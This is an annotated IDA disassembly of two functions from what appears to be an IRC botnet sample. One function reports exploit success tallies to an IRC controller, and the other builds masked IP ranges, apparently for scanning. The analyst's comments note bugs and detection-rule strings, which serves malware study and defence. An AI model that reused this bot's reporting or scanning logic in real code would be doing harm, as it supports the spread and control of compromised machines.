seg000:00401000 ; seg000:00401000 ; +-------------------------------------------------------------------------+ seg000:00401000 ; ¦ This file is generated by The Interactive Disassembler (IDA) ¦ seg000:00401000 ; ¦ Copyright (c) 2005 by DataRescue sa/nv, <ida@datarescue.com> ¦ seg000:00401000 ; ¦ Licensed to: Sebastian Porst, 1 user std, 05/2005 ¦ seg000:00401000 ; +-------------------------------------------------------------------------+ seg000:00401000 ; seg000:00401000 ; Format : Portable executable for 80386 (PE) seg000:00401000 ; Imagebase : 400000 seg000:00401000 ; Section 1. (virtual address 00001000) seg000:00401000 ; Virtual size : 00016000 ( 90112.) seg000:00401000 ; Section size in file : 00016000 ( 90112.) seg000:00401000 ; Offset to raw data for section: 00001000 seg000:00401000 ; Flags C0000040: Data Readable Writable seg000:00401000 ; Alignment : default seg000:00401000 seg000:00401000 seg000:00401000 unicode macro page,string,zero seg000:00401000 irpc c,<string> seg000:00401000 db '&c', page seg000:00401000 endm seg000:00401000 ifnb <zero> seg000:00401000 dw zero seg000:00401000 endif seg000:00401000 endm seg000:00401000 seg000:00401000 .686p seg000:00401000 .mmx seg000:00401000 .model flat seg000:00401000 seg000:00401000 ; --------------------------------------------------------------------------- seg000:00401000 seg000:00401000 ; Segment type: Pure code seg000:00401000 ; Segment permissions: Read/Write seg000:00401000 seg000 segment para public 'DATA' use32 seg000:00401000 assume cs:seg000 seg000:00401000 ;org 401000h seg000:00401000 assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing seg000:00401000 seg000:00401000 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ seg000:00401000 seg000:00401000 ; Tally up the number of exploits executed. If the total number of exploits exceeds a certain threshold a user on IRC is messaged. 
seg000:00401000 ; @param conn An IRC connection
seg000:00401000 ; @param target An IRC nick
seg000:00401000 ; @param verbose Switches on verbose mode (non-zero: the report is always sent)
seg000:00401000 ; @param total Exploit threshold (signed compare; report sent when the sum is strictly greater)
seg000:00401000 ; @return -
seg000:00401000 ;
seg000:00401000 ; Register roles: esi = sprintf, edi = strncat, ebx = 202h (count passed to every strncat),
seg000:00401000 ; var_4 = cursor over the exploit table (40h-byte records, starting at exploit.name),
seg000:00401000 ; var_8 = running sum of the per-record counters.
seg000:00401000 ; Buffers: var_20C = the report line (204h bytes, up to var_8); var_410 = scratch for each
seg000:00401000 ; formatted fragment (204h bytes, up to var_20C). sprintf into var_410 is unbounded.
seg000:00401000 ; Analyst note: the literals "SCAN//", "%s Exploit Statistics:", " %s: %d," and
seg000:00401000 ; " Exploit FTPD: %d, Total: %d in %s." are stable text usable in detection rules for this sample.
seg000:00401000 ; Attributes: bp-based frame
seg000:00401000
seg000:00401000 ListExploitStats proc near ; CODE XREF: IRC_CommandParse+2B37p
seg000:00401000
seg000:00401000 var_410 = dword ptr -410h
seg000:00401000 var_20C = dword ptr -20Ch
seg000:00401000 var_8 = dword ptr -8
seg000:00401000 var_4 = dword ptr -4
seg000:00401000 conn = dword ptr 8
seg000:00401000 target = dword ptr 0Ch
seg000:00401000 verbose = dword ptr 10h
seg000:00401000 total = dword ptr 14h
seg000:00401000
seg000:00401000 push ebp
seg000:00401001 mov ebp, esp
seg000:00401003 sub esp, 410h
seg000:00401009 and [ebp+var_8], 0 ; sum = 0
seg000:0040100D push ebx
seg000:0040100E push esi
seg000:0040100F mov esi, ds:sprintf
seg000:00401015 push edi
seg000:00401016 push offset aScan ; "SCAN//"
seg000:0040101B lea eax, [ebp+var_20C]
seg000:00401021 push offset aSExploitStatis ; "%s Exploit Statistics:"
seg000:00401026 push eax
seg000:00401027 call esi ; sprintf(var_20C, "%s Exploit Statistics:", "SCAN//")
seg000:00401029 mov edi, ds:strncat
seg000:0040102F add esp, 0Ch
seg000:00401032 cmp ds:exploit.port, 0 ; empty table? (presumably the same field the loop tests at [rec+21h])
seg000:00401039 mov ebx, 202h ; strncat count for every append below
seg000:0040103E jz short loc_401093 ; no records -> skip straight to the footer
seg000:00401040 mov [ebp+var_4], offset exploit.name ; rec = first record
seg000:00401047
seg000:00401047 @This loop sums up the exploit stats
seg000:00401047
seg000:00401047 loc_401047: ; CODE XREF: ListExploitStats+91j
seg000:00401047 push offset aBanner ; "banner"
seg000:0040104C push [ebp+var_4]
seg000:0040104F call ds:dword_4170D0 ; dword_4170D0(rec, "banner"); import not resolved in this listing - presumably a string compare
seg000:00401055 test eax, eax
seg000:00401057 jz short loc_401086 ; zero result -> this record is left out of the report
seg000:00401059 mov ecx, [ebp+var_4]
seg000:0040105C mov eax, [ecx+29h] ; per-record counter at +29h
seg000:0040105F add [ebp+var_8], eax ; sum += counter
seg000:00401062 push eax
seg000:00401063 push ecx ; %s gets the record base, i.e. the name is the first field
seg000:00401064 lea eax, [ebp+var_410]
seg000:0040106A push offset aSD ; " %s: %d,"
seg000:0040106F push eax
seg000:00401070 call esi ; sprintf(var_410, " %s: %d,", rec, counter)
seg000:00401072 lea eax, [ebp+var_410]
seg000:00401078 push ebx
seg000:00401079 push eax
seg000:0040107A lea eax, [ebp+var_20C]
seg000:00401080 push eax
seg000:00401081 call edi ; strncat(var_20C, var_410, 202h)
seg000:00401081 ; NOTE(review): 202h bounds this single append, not the space left in the
seg000:00401081 ; 204h-byte var_20C, which already holds the header and earlier fragments;
seg000:00401081 ; nothing tracks the remaining capacity across iterations.
seg000:00401083 add esp, 1Ch ; 4 args sprintf + 3 args strncat
seg000:00401086
seg000:00401086 loc_401086: ; CODE XREF: ListExploitStats+57j
seg000:00401086 add [ebp+var_4], 40h ; rec = next 40h-byte record
seg000:0040108A mov eax, [ebp+var_4]
seg000:0040108D cmp dword ptr [eax+21h], 0 ; a zero dword at +21h terminates the table
seg000:00401091 jnz short loc_401047
seg000:00401093
seg000:00401093 loc_401093: ; CODE XREF: ListExploitStats+3Ej
seg000:00401093 push 0
seg000:00401095 push ds:dword_43D044
seg000:0040109B call ds:dword_4170D0 ; dword_4170D0(dword_43D044, 0); result is handed straight to Uptime
seg000:004010A1 push eax
seg000:004010A2 call Uptime ; -> the "%s" of the footer
seg000:004010A7 add esp, 0Ch ; 2 + 1 args
seg000:004010AA push eax
seg000:004010AB lea eax, [ebp+var_410]
seg000:004010B1 push [ebp+var_8]
seg000:004010B4 push ds:dword_43D000
seg000:004010BA push offset aExploitFtpdDTo ; " Exploit FTPD: %d, Total: %d in %s."
seg000:004010BF push eax
seg000:004010C0 call esi ; sprintf(var_410, fmt, dword_43D000, sum, uptime)
seg000:004010C2 lea eax, [ebp+var_410]
seg000:004010C8 push ebx
seg000:004010C9 push eax
seg000:004010CA lea eax, [ebp+var_20C]
seg000:004010D0 push eax
seg000:004010D1 call edi ; strncat(var_20C, var_410, 202h) - same count caveat as above
seg000:004010D3 mov eax, [ebp+var_8]
seg000:004010D6 add esp, 20h ; 5 args sprintf + 3 args strncat
seg000:004010D9 cmp eax, [ebp+total] ; flags survive the three pops below
seg000:004010DC pop edi
seg000:004010DD pop esi
seg000:004010DE pop ebx
seg000:004010DF jg short loc_4010E7 ; sum > total (signed) -> report
seg000:004010E1 cmp [ebp+verbose], 0
seg000:004010E5 jz short locret_4010FC ; neither condition -> return silently
seg000:004010E7
seg000:004010E7 @Message the user if the threshold was met or verbose mode is on
seg000:004010E7
seg000:004010E7 loc_4010E7: ; CODE XREF: ListExploitStats+DFj
seg000:004010E7 lea eax, [ebp+var_20C]
seg000:004010ED push eax
seg000:004010EE push [ebp+target]
seg000:004010F1 push [ebp+conn]
seg000:004010F4 call IRC__privmsg ; IRC__privmsg(conn, target, var_20C)
seg000:004010F9 add esp, 0Ch
seg000:004010FC
seg000:004010FC locret_4010FC: ; CODE XREF: ListExploitStats+E5j
seg000:004010FC leave
seg000:004010FD retn
seg000:004010FD ListExploitStats endp
seg000:004010FD
seg000:0040129B
seg000:0040129B ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
seg000:0040129B
seg000:0040129B ; Takes an IP address and sets some parts of it to either x or 0
seg000:0040129B ; @param ip An IP address (arg_0; reused as the loop counter once the input is copied)
seg000:0040129B ; @param Random If true, parts of the IP address are replaced by 'x', otherwise by 0. (arg_4)
seg000:0040129B ; @param Class IP Class of the generated IP (arg_8): 1 keeps one octet, 2 keeps two, 3 keeps three
seg000:0040129B ; @return The generated IP address, or 0 when ip is NULL, fewer than four dot-separated
seg000:0040129B ; tokens are found, or Class is not 1, 2 or 3
seg000:0040129B ;
seg000:0040129B ; Register roles: esi = dword_4171E4 (tokenizer import; the (buf, ".") then (0, ".") call
seg000:0040129B ; pattern looks like strtok - unresolved here), edi = "." delimiter, ebx = cursor over
seg000:0040129B ; var_C / var_8 / [ebp-4] for tokens 2..4, var_10 = token 1, var_20 = 10h-byte copy of ip.
seg000:0040129B ; The result is written to the static 10h-byte buffer unk_428944, shared by all callers
seg000:0040129B ; (not reentrant).
seg000:0040129B ; Attributes: bp-based frame
seg000:0040129B
seg000:0040129B MakeIP proc near ; CODE XREF: IRC_CommandParse+239Cp
seg000:0040129B ; IRC_CommandParse+289Cp
seg000:0040129B
seg000:0040129B var_20 = dword ptr -20h
seg000:0040129B var_10 = dword ptr -10h
seg000:0040129B var_C = dword ptr -0Ch
seg000:0040129B var_8 = dword ptr -8
seg000:0040129B arg_0 = dword ptr 8
seg000:0040129B arg_4 = dword ptr 0Ch
seg000:0040129B arg_8 = dword ptr 10h
seg000:0040129B
seg000:0040129B push ebp
seg000:0040129C mov ebp, esp
seg000:0040129E sub esp, 20h
seg000:004012A1 cmp [ebp+arg_0], 0
seg000:004012A5 push ebx
seg000:004012A6 push esi
seg000:004012A7 push edi
seg000:004012A8 jz loc_4013A1 ; ip == NULL -> return 0
seg000:004012AE push 10h
seg000:004012B0 push 0
seg000:004012B2 push offset unk_428944
seg000:004012B7 call ZeroMemory ; ZeroMemory(unk_428944, 0, 10h): clear the shared output buffer (cdecl here - cleaned by the add esp, 20h below)
seg000:004012BC push 10h
seg000:004012BE lea eax, [ebp+var_20]
seg000:004012C1 push [ebp+arg_0]
seg000:004012C4 push eax
seg000:004012C5 call ds:dword_4171E0 ; dword_4171E0(var_20, ip, 10h): bounded copy into the 10h-byte var_20
seg000:004012C5 ; NOTE(review): if this is strncpy, an input of 10h or more characters leaves
seg000:004012C5 ; var_20 unterminated and the tokenizer below reads past it - confirm the import.
seg000:004012CB mov esi, ds:dword_4171E4
seg000:004012D1 mov edi, offset a__0 ; "."
seg000:004012D6 lea eax, [ebp+var_20]
seg000:004012D9 push edi
seg000:004012DA push eax
seg000:004012DB call esi ; dword_4171E4(var_20, ".") - first token
seg000:004012DD add esp, 20h ; 3 + 3 + 2 args of the three calls above
seg000:004012E0 mov [ebp+var_10], eax ; octet 1
seg000:004012E3 test eax, eax
seg000:004012E5 jz loc_4013A1 ; no token -> return 0
seg000:004012EB mov [ebp+arg_0], 1 ; arg_0 now counts tokens
seg000:004012F2 lea ebx, [ebp+var_C] ; next token slot
seg000:004012F5
seg000:004012F5 @Tokenize the input IP address
seg000:004012F5
seg000:004012F5 loc_4012F5: ; CODE XREF: MakeIP+77j
seg000:004012F5 push edi
seg000:004012F6 push 0
seg000:004012F8 call esi ; dword_4171E4(0, ".") - next token
seg000:004012FA xor edx, edx ; edx = 0; still relied on by the cmp ..., edx tests after the loop
seg000:004012FC pop ecx ; discard the two pushed args
seg000:004012FD cmp eax, edx
seg000:004012FF pop ecx
seg000:00401300 mov [ebx], eax ; store token: var_C, var_8, then [ebp-4]
seg000:00401302 jz loc_4013A1 ; fewer than four tokens -> return 0
seg000:00401308 inc [ebp+arg_0]
seg000:0040130B add ebx, 4
seg000:0040130E cmp [ebp+arg_0], 4
seg000:00401312 jl short loc_4012F5 ; tokens 2..4
seg000:00401314 cmp [ebp+arg_8], 1
seg000:00401318
seg000:00401318 @Create a class 1 IP
seg000:00401318
seg000:00401318 jnz short loc_401343
seg000:0040131A cmp [ebp+arg_4], edx ; Random != 0 ? (edx is 0)
seg000:0040131D mov ecx, offset asc_41981C ; "x"
seg000:00401322 mov eax, offset a0 ; "0"
seg000:00401327 mov esi, ecx ; octet 4 = "x"
seg000:00401329 jnz short loc_40132D
seg000:0040132B mov esi, eax ; ... or "0" when Random is false
seg000:0040132D
seg000:0040132D loc_40132D: ; CODE XREF: MakeIP+8Ej
seg000:0040132D cmp [ebp+arg_4], edx
seg000:00401330 mov edx, ecx ; octet 3 = "x"
seg000:00401332 jnz short loc_401336
seg000:00401334 mov edx, eax ; ... or "0"
seg000:00401336
seg000:00401336 loc_401336: ; CODE XREF: MakeIP+97j
seg000:00401336 cmp [ebp+arg_4], 0
seg000:0040133A jz short loc_40133E ; octet 2 stays "0"
seg000:0040133C mov eax, ecx ; ... or "x"
seg000:0040133E
seg000:0040133E loc_40133E: ; CODE XREF: MakeIP+9Fj
seg000:0040133E push esi ; octet 4 (replaced)
seg000:0040133F push edx ; octet 3 (replaced)
seg000:00401340 push eax ; octet 2 (replaced)
seg000:00401341 jmp short loc_401384 ; octet 1 is pushed there
seg000:00401343 ; ---------------------------------------------------------------------------
seg000:00401343 @Create a class 2 IP
seg000:00401343
seg000:00401343 loc_401343: ; CODE XREF: MakeIP+7Dj
seg000:00401343 cmp [ebp+arg_8], 2
seg000:00401347 jnz short loc_401368
seg000:00401349 cmp [ebp+arg_4], edx ; Random != 0 ? (edx is 0)
seg000:0040134C mov ecx, offset asc_41981C ; "x"
seg000:00401351 mov eax, offset a0 ; "0"
seg000:00401356 mov edx, ecx ; octet 4 = "x"
seg000:00401358 jnz short loc_40135C
seg000:0040135A mov edx, eax ; ... or "0"
seg000:0040135C
seg000:0040135C loc_40135C: ; CODE XREF: MakeIP+BDj
seg000:0040135C cmp [ebp+arg_4], 0
seg000:00401360 jz short loc_401364 ; octet 3 stays "0"
seg000:00401362 mov eax, ecx ; ... or "x"
seg000:00401364
seg000:00401364 loc_401364: ; CODE XREF: MakeIP+C5j
seg000:00401364 push edx ; octet 4 (replaced)
seg000:00401365 push eax ; octet 3 (replaced)
seg000:00401366 jmp short loc_401381 ; octets 2 and 1 are pushed there
seg000:00401368 ; ---------------------------------------------------------------------------
seg000:00401368 @Create a class 3 IP
seg000:00401368
seg000:00401368 loc_401368: ; CODE XREF: MakeIP+ACj
seg000:00401368 cmp [ebp+arg_8], 3
seg000:0040136C jnz short loc_4013A1 ; unknown class -> return 0
seg000:0040136E cmp [ebp+arg_4], edx ; Random != 0 ? (edx is 0)
seg000:00401371 mov eax, offset asc_41981C ; "x"
seg000:00401376 jnz short loc_40137D
seg000:00401378 mov eax, offset a0 ; "0"
seg000:0040137D
seg000:0040137D loc_40137D: ; CODE XREF: MakeIP+DBj
seg000:0040137D push eax ; octet 4 (replaced)
seg000:0040137E push [ebp+var_8] ; octet 3 (kept)
seg000:00401381
seg000:00401381 loc_401381: ; CODE XREF: MakeIP+CBj
seg000:00401381 push [ebp+var_C] ; octet 2 (kept)
seg000:00401384
seg000:00401384 loc_401384: ; CODE XREF: MakeIP+A6j
seg000:00401384 push [ebp+var_10] ; octet 1 (always kept)
seg000:00401387 push offset aS_S_S_S ; "%s.%s.%s.%s"
seg000:0040138C push offset unk_428944
seg000:00401391 call ds:sprintf ; sprintf(unk_428944, "%s.%s.%s.%s", o1, o2, o3, o4)
seg000:00401391 ; NOTE(review): the target is 10h bytes; the output only fits if the kept
seg000:00401391 ; tokens are short (15 chars + NUL in total), and nothing here bounds them.
seg000:00401397 add esp, 18h ; 6 args
seg000:0040139A mov eax, offset unk_428944 ; return the shared buffer
seg000:0040139F jmp short loc_4013A3
seg000:004013A1 ; ---------------------------------------------------------------------------
seg000:004013A1
seg000:004013A1 loc_4013A1: ; CODE XREF: MakeIP+Dj
seg000:004013A1 ; MakeIP+4Aj ...
seg000:004013A1 xor eax, eax ; error path -> NULL
seg000:004013A3
seg000:004013A3 loc_4013A3: ; CODE XREF: MakeIP+104j
seg000:004013A3 pop edi
seg000:004013A4 pop esi
seg000:004013A5 pop ebx
seg000:004013A6 leave
seg000:004013A7 retn
seg000:004013A7 MakeIP endp
seg000:004013A7